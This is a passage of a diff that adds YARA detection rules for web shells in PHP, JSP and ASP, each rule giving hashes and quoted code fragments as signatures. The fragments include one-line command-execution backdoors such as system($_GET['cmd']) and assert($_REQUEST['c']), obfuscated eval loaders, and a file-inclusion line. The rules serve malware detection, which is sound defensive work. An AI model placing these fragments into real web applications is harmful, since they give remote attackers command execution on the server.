+		description = "Web Shell - file simple-backdoor.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+	strings:
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s4 = "system($cmd);" fullword
+	condition:
+		2 of them
+}
+rule webshell_PHP_404 {
+	meta:
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "078c55ac475ab9e028f94f879f548bca"
+	strings:
+		$s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
+	condition:
+		all of them
+}
+rule webshell_Macker_s_Private_PHPShell {
+	meta:
+		description = "Web Shell - file Macker's Private PHPShell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e24cbf0e294da9ac2117dc660d890bb9"
+	strings:
+		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+	condition:
+		all of them
+}
+rule webshell_Antichat_Shell_v1_3_2 {
+	meta:
+		description = "Web Shell - file Antichat Shell v1.3.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "40d0abceba125868be7f3f990f031521"
+	strings:
+		$s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
+	condition:
+		all of them
+}
+rule webshell_Safe_mode_breaker {
+	meta:
+		description = "Web Shell - file Safe mode breaker.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5bd07ccb1111950a5b47327946bfa194"
+	strings:
+		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
+		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
+	condition:
+		1 of them
+}
+rule webshell_Sst_Sheller {
+	meta:
+		description = "Web Shell - file Sst-Sheller.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d93c62a0a042252f7531d8632511ca56"
+	strings:
+		$s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
+		$s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
+	condition:
+		all of them
+}
+rule webshell_jsp_list {
+	meta:
+		description = "Web Shell - file list.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1ea290ff4259dcaeb680cec992738eda"
+	strings:
+		$s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+		$s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
+		$s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
+	condition:
+		all of them
+}
+rule webshell_PHPJackal_v1_5 {
+	meta:
+		description = "Web Shell - file PHPJackal v1.5.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d76dc20a4017191216a0315b7286056f"
+	strings:
+		$s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
+		$s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
+	condition:
+		all of them
+}
+rule webshell_customize {
+	meta:
+		description = "Web Shell - file customize.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d55578eccad090f30f5d735b8ec530b1"
+	strings:
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+	condition:
+		all of them
+}
+rule webshell_s72_Shell_v1_1_Coding {
+	meta:
+		description = "Web Shell - file s72 Shell v1.1 Coding.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+	strings:
+		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
+	condition:
+		all of them
+}
+rule webshell_jsp_sys3 {
+	meta:
+		description = "Web Shell - file sys3.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b3028a854d07674f4d8a9cf2fb6137ec"
+	strings:
+		$s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_guige02 {
+	meta:
+		description = "Web Shell - file guige02.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a3b8b2280c56eaab777d633535baf21d"
+	strings:
+		$s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
+		$s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
+	condition:
+		all of them
+}
+rule webshell_php_ghost {
+	meta:
+		description = "Web Shell - file ghost.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "38dc8383da0859dca82cf0c943dbf16d"
+	strings:
+		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
+		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
+		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
+	condition:
+		all of them
+}
+rule webshell_WinX_Shell {
+	meta:
+		description = "Web Shell - file WinX Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+	strings:
+		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
+		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
+	condition:
+		all of them
+}
+rule webshell_Crystal_Crystal {
+	meta:
+		description = "Web Shell - file Crystal.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "fdbf54d5bf3264eb1c4bff1fac548879"
+	strings:
+		$s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"
+		$s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"
+	condition:
+		all of them
+}
+rule webshell_r57_1_4_0 {
+	meta:
+		description = "Web Shell - file r57.1.4.0.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "574f3303e131242568b0caf3de42f325"
+	strings:
+		$s4 = "@ini_set('error_log',NULL);" fullword
+		$s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+		$s7 = "@ini_restore(\"disable_functions\");" fullword
+		$s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_hsxa1 {
+	meta:
+		description = "Web Shell - file hsxa1.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5686d5a38c6f5b8c55095af95c2b0244"
+	strings:
+		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+	condition:
+		all of them
+}
+rule webshell_asp_ajn {
+	meta:
+		description = "Web Shell - file ajn.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "aaafafc5d286f0bff827a931f6378d04"
+	strings:
+		$s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword
+		$s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve"
+	condition:
+		all of them
+}
+rule webshell_php_cmd {
+	meta:
+		description = "Web Shell - file cmd.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"
+	strings:
+		$s0 = "if($_GET['cmd']) {" fullword
+		$s1 = "// cmd.php = Command Execution" fullword
+		$s7 = "  system($_GET['cmd']);" fullword
+	condition:
+		all of them
+}
+rule webshell_asp_list {
+	meta:
+		description = "Web Shell - file list.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"
+	strings:
+		$s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword
+		$s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_co {
+	meta:
+		description = "Web Shell - file co.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "62199f5ac721a0cb9b28f465a513874c"
+	strings:
+		$s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword
+		$s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_150 {
+	meta:
+		description = "Web Shell - file 150.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "400c4b0bed5c90f048398e1d268ce4dc"
+	strings:
+		$s0 = "HJ3HjqxclkZfp"
+		$s1 = "<? eval(gzinflate(base64_decode('" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_cmdjsp_2 {
+	meta:
+		description = "Web Shell - file cmdjsp.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1b5ae3649f03784e2a5073fa4d160c8b"
+	strings:
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
+		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_c37 {
+	meta:
+		description = "Web Shell - file c37.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d01144c04e7a46870a8dd823eb2fe5c8"
+	strings:
+		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
+		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
+	condition:
+		all of them
+}
+rule webshell_PHP_b37 {
+	meta:
+		description = "Web Shell - file b37.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0421445303cfd0ec6bc20b3846e30ff0"
+	strings:
+		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
+	condition:
+		all of them
+}
+rule webshell_php_backdoor {
+	meta:
+		description = "Web Shell - file php-backdoor.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+	strings:
+		$s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword
+		$s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
+	condition:
+		all of them
+}
+rule webshell_asp_dabao {
+	meta:
+		description = "Web Shell - file dabao.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3919b959e3fa7e86d52c2b0a91588d5d"
+	strings:
+		$s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location =&#039;\" &"
+		$s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-"
+	condition:
+		all of them
+}
+rule webshell_php_2 {
+	meta:
+		description = "Web Shell - file 2.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "267c37c3a285a84f541066fc5b3c1747"
+	strings:
+		$s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword
+	condition:
+		all of them
+}
+rule webshell_asp_cmdasp {
+	meta:
+		description = "Web Shell - file cmdasp.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "57b51418a799d2d016be546f399c2e9b"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+	condition:
+		all of them
+}
+rule webshell_spjspshell {
+	meta:
+		description = "Web Shell - file spjspshell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d39d51154aaad4ba89947c459a729971"
+	strings:
+		$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
+	condition:
+		all of them
+}
+rule webshell_jsp_action {
+	meta:
+		description = "Web Shell - file action.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
+	strings:
+		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
+		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
+	condition:
+		all of them
+}
+rule webshell_Inderxer {
+	meta:
+		description = "Web Shell - file Inderxer.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+	strings:
+		$s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+	condition:
+		all of them
+}
+rule webshell_asp_Rader {
+	meta:
+		description = "Web Shell - file Rader.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ad1a362e0a24c4475335e3e891a01731"
+	strings:
+		$s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
+		$s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
+	condition:
+		all of them
+}
+rule webshell_c99_madnet_smowu {
+	meta:
+		description = "Web Shell - file smowu.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3aaa8cad47055ba53190020311b0fb83"
+	strings:
+		$s0 = "//Authentication" fullword
+		$s1 = "$login = \"" fullword
+		$s2 = "eval(gzinflate(base64_decode('"
+		$s4 = "//Pass" 
+		$s5 = "$md5_pass = \"" 
+		$s6 = "//If no pass then hash"
+	condition:
+		all of them
+}
+rule webshell_php_moon {
+	meta:
+		description = "Web Shell - file moon.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
+	strings:
+		$s2 = "echo '<option value=\"create function backshell returns string soname"
+		$s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
+		$s8 = "echo '<option value=\"select cmdshell(\\'net user "
+	condition:
+		2 of them
+}
+rule webshell_jsp_jdbc {
+	meta:
+		description = "Web Shell - file jdbc.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "23b0e6f91a8f0d93b9c51a2a442119ce"
+	strings:
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+	condition:
+		all of them
+}
+rule webshell_minupload {
+	meta:
+		description = "Web Shell - file minupload.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ec905a1395d176c27f388d202375bdf9"
+	strings:
+		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
+		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
+	condition:
+		all of them
+}
+rule webshell_ELMALISEKER_Backd00r {
+	meta:
+		description = "Web Shell - file ELMALISEKER Backd00r.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
+	strings:
+		$s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"
+		$s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"
+	condition:
+		all of them
+}
+rule webshell_PHP_bug_1_ {
+	meta:
+		description = "Web Shell - file bug (1).php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "91c5fae02ab16d51fc5af9354ac2f015"
+	strings:
+		$s0 = "@include($_GET['bug']);" fullword
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_hkmjj {
+	meta:
+		description = "Web Shell - file hkmjj.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e7b994fe9f878154ca18b7cde91ad2d0"
+	strings:
+		$s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_asd {
+	meta:
+		description = "Web Shell - file asd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a042c2ca64176410236fcc97484ec599"
+	strings:
+		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
+		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
+	condition:
+		all of them
+}
+rule webshell_jsp_inback3 {
+	meta:
+		description = "Web Shell - file inback3.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ea5612492780a26b8aa7e5cedd9b8f4e"
+	strings:
+		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+	condition:
+		all of them
+}
+rule webshell_metaslsoft {
+	meta:
+		description = "Web Shell - file metaslsoft.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "aa328ed1476f4a10c0bcc2dde4461789"
+	strings:
+		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
+	condition:
+		all of them
+}
+rule webshell_asp_Ajan {
+	meta:
+		description = "Web Shell - file Ajan.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b6f468252407efc2318639da22b08af0"
+	strings:
+		$s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
+	condition:
+		all of them
+}
+rule webshell_config_myxx_zend {
+	meta:
+		description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash1 = "e0354099bee243702eb11df8d0e046df"
+		hash2 = "591ca89a25f06cf01e4345f98a22845c"
+	strings:
+		$s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
+	condition:
+		all of them
+}
+rule webshell_browser_201_3_ma_download {
+	meta:
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+	strings:
+		$s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"
+		$s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"
+	condition:
+		all of them
+}
+rule webshell_itsec_itsecteam_shell_jHn {
+	meta:
+		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash2 = "40c6ecf77253e805ace85f119fe1cebb"
+	strings:
+		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
+		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
+	condition:
+		all of them
+}
+rule webshell_ghost_source_icesword_silic {
+	meta:
+		description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
+		hash1 = "6e20b41c040efb453d57780025a292ae"
+		hash2 = "437d30c94f8eef92dc2f064de4998695"
+	strings:
+		$s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
+		$s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
+	condition:
+		all of them
+}
+rule webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash6 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash7 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash8 = "d71716df5042880ef84427acee8b121e"
+		hash9 = "341298482cf90febebb8616426080d1d"
+		hash10 = "29aebe333d6332f0ebc2258def94d57e"
+		hash11 = "42654af68e5d4ea217e6ece5389eb302"
+		hash12 = "88fc87e7c58249a398efd5ceae636073"
+		hash13 = "4a812678308475c64132a9b56254edbc"
+		hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash15 = "344f9073576a066142b2023629539ebd"
+		hash16 = "32dea47d9c13f9000c4c807561341bee"
+		hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash18 = "655722eaa6c646437c8ae93daac46ae0"
+		hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash20 = "9c94637f76e68487fa33f7b0030dd932"
+		hash21 = "6acc82544be056580c3a1caaa4999956"
+		hash22 = "6aa32a6392840e161a018f3907a86968"
+		hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash24 = "3ea688e3439a1f56b16694667938316d"
+		hash25 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash26 = "71097537a91fac6b01f46f66ee2d7749"
+		hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
+		$s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
+	condition:
+		all of them
+}
+rule webshell_2_520_job_ma1_ma4_2 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash4 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+	strings:
+		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
+		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
+	condition:
+		all of them
+}
+rule webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "9c94637f76e68487fa33f7b0030dd932"
+		hash23 = "6acc82544be056580c3a1caaa4999956"
+		hash24 = "6aa32a6392840e161a018f3907a86968"
+		hash25 = "591ca89a25f06cf01e4345f98a22845c"
+		hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash27 = "3ea688e3439a1f56b16694667938316d"
+		hash28 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash29 = "71097537a91fac6b01f46f66ee2d7749"
+		hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
+		$s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
+	condition:
+		all of them
+}
+rule webshell_wso2_5_1_wso2_5_wso2 {
+	meta:
+		description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "dbeecd555a2ef80615f0894027ad75dc"
+		hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
+		hash2 = "cbc44fb78220958f81b739b493024688"
+	strings:
+		$s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"
+		$s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"
+	condition:
+		all of them
+}
+rule webshell_000_403_c5_queryDong_spyjsp2010_t00ls {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
+		hash5 = "9c94637f76e68487fa33f7b0030dd932"
+	strings:
+		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
+		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
+	condition:
+		all of them
+}
+rule webshell_404_data_suiyue {
+	meta:
+		description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
